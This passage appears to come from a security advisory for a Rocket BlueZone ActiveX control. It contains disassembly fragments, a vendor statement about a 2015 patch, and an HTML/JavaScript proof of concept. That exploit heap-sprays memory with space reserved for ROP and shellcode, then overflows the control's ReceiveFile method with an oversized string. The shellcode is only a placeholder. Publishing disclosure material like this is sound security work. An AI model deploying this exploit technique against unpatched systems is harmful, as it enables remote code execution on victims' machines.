 1001F95B  FF15F8610210              		call	[KERNEL32.dll!lstrcatA]
 1001F961  EB75                      		jmp	L1001F9D8

Proof of Concept

<html>
<body>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<div id=blah></div>
<script>
        var div_container = document.getElementById("blah");
        div_container.style.cssText = "display:none";
        var data;
        offset = 0x100;
        junk = unescape("%u0c0c%u0c0c");
        while (junk.length < 0x1000) junk += junk;
        rop = unescape("%u4141%u4141");
        shellcode = unescape("%u4141%u4141");
        data = junk.substring(0,offset) + rop + shellcode
        data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x600; i++)
        {
                var x = document.createElement("button");
                x.title = data.substring(0,0x40000-0x58);
                div_container.appendChild(x);
        }
obj.UserName = "aaaaaaaa";
obj.Password = "bbbbbbbb";
bof = "";
for (i=0; i<15000; i++){
   bof = bof + "!!!!";
}
obj.ReceiveFile(bof,"");
</script>

Vendor Response
The vendor has responded that they have released a patch (2nd of September 2015) and commented that:

In addition to placing the BlueZone announcement on the Rocket Customer Portal, we have added the vulnerability announcement to our website.
You may find the information via this link on our BlueZone product page:
https://www.rocketsoftware.com/product-families/rocket-bluezone-passport
There is also a dedicated page for the announcement if someone does a search for it on the Rocket website:
https://www.rocketsoftware.com/rocket-bluezone-security-annoucement
The patch location is within Rocket’s Customer Portal, and is accessible by all affected customers.
Thanks again for your help and your notification to us.

?

Get in touch